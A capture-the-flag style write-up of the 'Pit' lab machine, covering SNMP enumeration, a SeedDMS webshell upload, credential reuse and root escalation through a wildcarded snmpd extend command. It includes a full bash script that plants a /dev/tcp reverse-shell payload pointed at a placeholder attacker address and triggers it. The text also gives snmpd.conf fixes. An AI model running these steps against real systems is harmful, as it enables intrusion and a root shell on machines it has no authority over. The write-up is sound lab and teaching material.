$ nmap -p- --min-rate 5000 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:05 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0095s latency).
Not shown: 65501 filtered tcp ports (no-response), 31 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
Two web ports this time: 80 and 9090.
Web Rabbit Holes
Port 9090 was an HTTPS site with a login page (nmap's "zeus-admin" label is just the nmap-services entry for that port number; this is the CentOS web console we end up logging into later):
We had no credentials, and the usual weak default credentials didn't work. Port 80 hosted a Red Hat default page:
Directory, subdomain and other web scans didn't find anything on either port. So, until we have credentials, both are a rabbit hole.
UDP Ports -> SNMP Enum
I also ran a UDP scan, in case something had been missed on the TCP side:
We can see that SNMP (161/udp) is open and not filtered. We can take a closer look at its version using nmap's service detection:
$ sudo nmap -sU -p 161 -sV 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:10 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0085s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pit.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
It seems that this is an SNMPv1 server with the default "public" community, so snmpwalk can read it without any credentials. A lot of information came back from a default walk and from a second, extended walk of the net-snmp subtree:
So we have two local users, michelle and root. The output also revealed a SeedDMS installation directory. Viewing the TLS certificate of the HTTPS site on port 9090 gives us a new hostname to enumerate.
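The enumeration above as a script, added here as an example rather than taken from the write-up. It walks the SNMPv1 service with the "public" community nmap reported and parses the three things the walks gave up on this box: local logins, the commands snmpd runs through NET-SNMP-EXTEND-MIB (including whether any of them use a shell wildcard, which matters for the privilege-escalation step later), and the process table. Numeric OIDs are used so the queries work without extra MIB files. The sample walk output embedded in the script is constructed to show the parsers offline, it was not captured from pit.htb, and the `/opt/monitor/check*.sh` path in it is a placeholder, not the path on the real box.

```shell
#!/usr/bin/env bash
# Added example, not part of the original write-up.
# Target and community come from the nmap output; everything else is parsed
# from saved snmpwalk output so it can be re-run without touching the box.

TARGET="${TARGET:-10.129.228.106}"
COMMUNITY="${COMMUNITY:-public}"

# "Default" walk: snmpwalk with no OID starts at mib-2 (.1.3.6.1.2.1).
snmp_walk_default() { snmpwalk -m ALL -v1 -c "$COMMUNITY" "$TARGET"; }

# "Extended" walk: nsExtendObjects (NET-SNMP-EXTEND-MIB, .1.3.6.1.4.1.8072.1.3.2),
# which lists the commands snmpd runs via "extend" and their last output.
snmp_walk_extend() { snmpwalk -m ALL -v1 -c "$COMMUNITY" "$TARGET" .1.3.6.1.4.1.8072.1.3.2; }

# Process table: hrSWRunName (HOST-RESOURCES-MIB, .1.3.6.1.2.1.25.4.2.1.2).
snmp_walk_procs() { snmpwalk -m ALL -v1 -c "$COMMUNITY" "$TARGET" .1.3.6.1.2.1.25.4.2.1.2; }

# --- parsers: read saved walk output on stdin --------------------------------

# name<TAB>command args for every "extend" entry snmpd has configured.
extend_commands() {
    awk -F'"' '
        /nsExtendCommand\./ { split($3, v, "STRING: "); cmd[$2]  = v[2] }
        /nsExtendArgs\./    { split($3, v, "STRING: "); args[$2] = v[2] }
        END { for (n in cmd) printf "%s\t%s %s\n", n, cmd[n], args[n] }
    ' | sort
}

# Extend entries whose command line contains a shell wildcard: if the
# globbed directory is writable by a low-privileged user, snmpd (root)
# will happily execute whatever is dropped there.
wildcard_extends() { extend_commands | grep -F '*' || true; }

# User names printed by the extend script (constructed "Login: <name>" lines).
extract_logins() {
    sed -n 's/.*nsExtendOutLine\."[^"]*"\.[0-9]* = STRING: Login: *\([A-Za-z0-9._-]*\).*/\1/p'
}

# Unique process names from hrSWRunName.
list_processes() {
    sed -n 's/.*hrSWRunName\.[0-9]* = STRING: "\(.*\)"$/\1/p' | sort -u
}

# CONSTRUCTED sample in net-snmp's output format. Values are made up for the
# demo (not captured from pit.htb); /opt/monitor/check*.sh is a placeholder.
SAMPLE_WALK='HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.812 = STRING: "snmpd"
HOST-RESOURCES-MIB::hrSWRunName.1204 = STRING: "httpd"
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/bash
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING: -c /opt/monitor/check*.sh
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Login: michelle
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".2 = STRING: Login: root'

if [ "${1:-}" = "demo" ]; then        # ./snmp_enum.sh demo -> parse the sample offline
    printf '%s\n' "$SAMPLE_WALK" | extract_logins
    printf '%s\n' "$SAMPLE_WALK" | wildcard_extends
    printf '%s\n' "$SAMPLE_WALK" | list_processes
elif [ "${1:-}" = "live" ]; then      # ./snmp_enum.sh live -> walk the target and save output
    snmp_walk_extend > extend.txt
    snmp_walk_procs  > procs.txt
    extract_logins   < extend.txt
    wildcard_extends < extend.txt
    list_processes   < procs.txt
fi
```

Run it with `demo` to see the parsers on the sample, or `live` to walk the target and keep `extend.txt` and `procs.txt` for later grepping. The `-m ALL` flag only affects how names are printed; if the HOST-RESOURCES MIB file is not installed locally, `list_processes` will not match because the output stays numeric, so install the MIBs (on Kali, `snmp-mibs-downloader`) before relying on it.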
Seed DMS
After adding the new hostname to our hosts file, we can browse to http://dms-pit.htb/seeddms51x/seeddms and find another login page:
I tried a few credentials, and michelle:michelle turned out to be the right pair to log in.
Once logged in, we can read the administrator's change log, which states the version of SeedDMS currently in use.
It appears to be version 5.1.15, for which searchsploit has no entries. SeedDMS is PHP based and supports document uploads, so let's try to upload a PHP webshell into Michelle's folder.
The upload got document ID 29, but it wasn't obvious how to reach the file from the browser. Checking the searchsploit output again, the RCE entries are for older SeedDMS versions, but they are still worth reading: they document where SeedDMS stores uploaded documents on disk under the web root, in a path built from the document ID, which is enough to request the uploaded webshell directly.
Great! With command execution through the webshell, I tried to get a reverse shell, but the box couldn't download any files or make any outbound connections from this context. So we need to look around further.
CentOS Credentials
Since we had a webshell, I wanted to see whether the credentials for the CentOS web console on port 9090 could be found on disk. The file system can be enumerated slowly through the webshell; the SeedDMS configuration directory is the first place to look, because the application has to store its database password somewhere the web server can read:
The password found this way doesn't work over SSH, but it does log us into the CentOS web console on port 9090 as michelle.
In the bottom left corner, we can open the Terminal application, which is effectively another webshell, this time running as michelle.
From there we can grab the user flag and also spawn a reverse shell as michelle.
Privilege Escalation
SNMP Processes -> Injection
I ran LinPEAS on the machine to enumerate for me, and it didn't find anything interesting. The process list as seen over SNMP is worth revisiting, using snmpwalk as we did earlier: snmpd runs as root, so anything it executes on our behalf (the "extend" commands from NET-SNMP-EXTEND-MIB that showed up in the earlier walk) runs as root too.
The extend entry runs its script through a shell wildcard, so any file in that directory whose name matches the pattern gets executed, and michelle can write to that directory. We can just create a script holding a bash reverse-shell one-liner, drop it into the directory (downloaded from our machine, or written straight from the web console terminal), and make sure it is executable, has a bash shebang (the /dev/tcp redirection is a bash feature), and has a name that matches the wildcard. Then we trigger it by walking the extend MIB with snmpwalk; the walk blocks while the script runs, which is expected, because snmpd is waiting for our reverse shell to exit:
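The whole step as a script, added here as an example and not the write-up's own code. It writes the bash reverse-shell payload into the globbed directory, checks that the file name really matches the wildcard (the same pathname expansion snmpd's `bash -c` will do), and triggers it by walking the extend MIB. The directory `/opt/monitor`, the glob `check*.sh`, the payload name `check_rev.sh` and the attacker address `10.10.14.2:4444` are placeholders; substitute the directory and pattern recovered from the walk output and your own listener.

```shell
#!/usr/bin/env bash
# Added example, not part of the original write-up. Abuses a NET-SNMP-EXTEND-MIB
# "extend" entry whose command line globs a directory that an unprivileged user
# can write to. All paths and addresses below are ASSUMED placeholders.

EXTEND_DIR="${EXTEND_DIR:-/opt/monitor}"       # assumed: writable dir globbed by snmpd
EXTEND_GLOB="${EXTEND_GLOB:-check*.sh}"        # assumed: the wildcard from nsExtendArgs
PAYLOAD_NAME="${PAYLOAD_NAME:-check_rev.sh}"   # must match EXTEND_GLOB
LHOST="${LHOST:-10.10.14.2}"                   # assumed attacker IP
LPORT="${LPORT:-4444}"
TARGET="${TARGET:-10.129.228.106}"             # from the nmap scan
COMMUNITY="${COMMUNITY:-public}"

# Write the reverse-shell script and make it executable. snmpd's
# "/usr/bin/bash -c '<glob>'" execs the matching file as a program, so the
# shebang decides the interpreter; /dev/tcp only exists in bash, hence #!/bin/bash.
# Prints the path it wrote.
write_payload() {   # write_payload DIR NAME LHOST LPORT
    local dir="$1" name="$2" lhost="$3" lport="$4" path
    path="$dir/$name"
    printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$lhost" "$lport" > "$path"
    chmod 755 "$path"
    printf '%s\n' "$path"
}

# Return 0 if PATH is one of the files the glob expands to inside DIR.
# "$1"/$2 is deliberately half-quoted so the pattern part is expanded.
matches_glob() {    # matches_glob DIR 'check*.sh' PATH
    local f
    for f in "$1"/$2; do
        [ "$f" = "$3" ] && return 0
    done
    return 1
}

# Querying nsExtendObjects makes snmpd (root) run the extend command to
# produce nsExtendOutLine, which executes our script. The walk hangs until the
# script exits: that is the reverse shell being alive, not a failure.
trigger() {
    snmpwalk -m ALL -v1 -c "$COMMUNITY" "$TARGET" .1.3.6.1.4.1.8072.1.3.2
}

if [ "${1:-}" = "run" ]; then   # ./snmp_extend_privesc.sh run  (from the michelle shell)
    p=$(write_payload "$EXTEND_DIR" "$PAYLOAD_NAME" "$LHOST" "$LPORT")
    matches_glob "$EXTEND_DIR" "$EXTEND_GLOB" "$p" || { echo "name does not match glob" >&2; exit 1; }
    echo "payload at $p, start a listener on $LHOST:$LPORT then query the MIB" >&2
    trigger
fi

# What the fix looks like on the snmpd side (snmpd.conf), for reference:
#   - no wildcard: point "extend" at one fixed script in a root-owned, 0755 directory
#       extend monitoring /usr/bin/bash -c /opt/monitor/check.sh
#   - and don't expose the enterprise subtree to the public community at all:
#       view systemonly included .1.3.6.1.2.1.1
#       rocommunity public default -V systemonly
```

Run `write_payload` and `matches_glob` from the michelle shell (the web console terminal is fine), start the listener on the attacking machine, and only then call `trigger` from the attacking machine: net-snmp caches extend output for a few seconds, so if the first walk returns stale output, wait and walk again.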